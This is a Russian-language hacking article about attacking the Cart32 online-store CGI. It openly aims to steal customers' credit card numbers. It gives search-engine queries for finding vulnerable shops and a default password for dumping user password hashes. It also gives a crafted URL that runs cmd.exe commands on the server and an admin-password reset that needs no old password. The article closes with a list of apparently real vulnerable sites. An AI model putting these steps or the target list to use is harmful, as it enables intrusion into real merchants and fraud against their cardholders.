Cart32 (http://www.cart32.com/)
- Shopping Cart System for Windows 95 & NT представляет из
себя “движок” для Он-лайн магазинов. А где
магазины, там, как известно, кредитные
карточки:).

Насколько мне известно,
последняя версия данного продукта – Cart31 v
3.6, является также уязвимой, как и ее
предшественники.

Для начала ты должен
научиться находить этот скрипт, по дефолту
он находится в директории CGI-BIN или SCRIPTS на
сервере. Если ты внимательно читал мои
прошлые статьи, то прекрасно знаешь как
искать незащищенные сервера через
поисковые системы. Итак, идем на АльтаВисту
(www.altavista.com) и
в окошке поиска вводим: “/scripts/cart32.exe/”, “/cgi-bin/cart32.exe/”
и начинаем разгребать ссылки:).

1) Если в системе разрешен запрос “ERROR”, то
пробуем: www.host.org/cgi-bin/cart32.exe/error. Скрипт может
вывести море информации по установленной
на серваке системе, листинг директории /cgi-bin/cart32
и директории, куда установлена программа (стандартно
- C:\Program Files\MWAInc\Cart32).

Пример:
INIFile = C:\Program Files\MWAInc\Cart32\cart32.ini
CGI Information
CGI_ServerSoftware = Microsoft-IIS/4.0
CGI_ServerName = www.host.org
CGI_RequestMethod = GET
CGI_Referer =
GI_RemoteHost = 313.373.3.333
CGI_RemoteAddr = 313.373.3.334
CGI_UserAgent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
CGI_ContentLength =0
CGI_ScriptName = /cgi-bin/cart32.exe
CGI_ServerURL =
CGI_GatewayInterface =CGI/1.1
CGI_ServerProtocol =HTTP/1.1
CGI_ServerPort = 80
CGI_ContentType =
CGI_QueryString =
CGI_PathInfo = /error
CGI_Cookie =

2) Если повезет, то админ
сервака проинсталлирует все в один каталог,
например в cgi-bin, и, прочитав лог об ошибке (см.
предыдущий пункт), мы увидим, что в директории
/cgi-bin/ находятся файлы blahblah-[число]. В этих
файлах находятся долгожданные кредитные
карточки ( в одном файле по одной креде).

Примечание : В старых версиях
вся информация о кредах хранилась в файле
blahblah-orders.txt

3) Стандартным паролем является "wemilo". C
данным паролем, вы можете пойти на
нижеприведенную ссылку, которая покажет
вам список всех юзеров и их хешированные
пароли:

http://www.victim.com/cgi-bin/cart32.exe/cart32clientlist

Воспользовавшись этой
уязвимостью, вы можете просмотреть список
всех пользователей и их хешированные
пароли. Хотя они и хешированные, их все
равно можно применить, введя
нижеприведенный URL:

http://www.host.org/cgi-bin/c32web.exe? TabName=Cart32%2B&Action=
Save+Cart32%2B+Tab&SaveTab= Cart32%2B&Client=foobar&ClientPassword=
e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=
&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave
=Run+External+Program&UseCMDLine=Yes&CMDLine= cmd.exe+%2Fc+dir+%3E+c%3A%5Czlob.txt

После успешного
выполнения этой операции, вся инфа будет
запишется в файл "zlob.txt" на диске C:\.

Более того, пойдя на
данный URL:

4) http://www.host.org/scripts/c32web.exe/
ChangeAdminPassword

можно сменить пароль
администратора, не зная старого :).

Это конечно же не все
уязвимости в этой проге, особо любопытные
перцы могут скачать  (ftp://ftp.cart32.com/c32full.exe
- 3,82 MB) сие чудо и самим попробовать найти
уязвимости.

Чтобы вам не было скучно
– даю пару УРЛцев:

http://qwe.ds/cgi-bin/cart32.exe/error
http://www.tcsn.net/cgi-bin/cart32.exe/error

http://www.backstreet-publish.com/cgi-bin/cart32/aaa.log

http://www.backstreet-publish.com/cgi-bin/cart32.exe/error

http://www.dakotamade.com/CGI-BIN/CART32.EXE/cart32clientlist

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии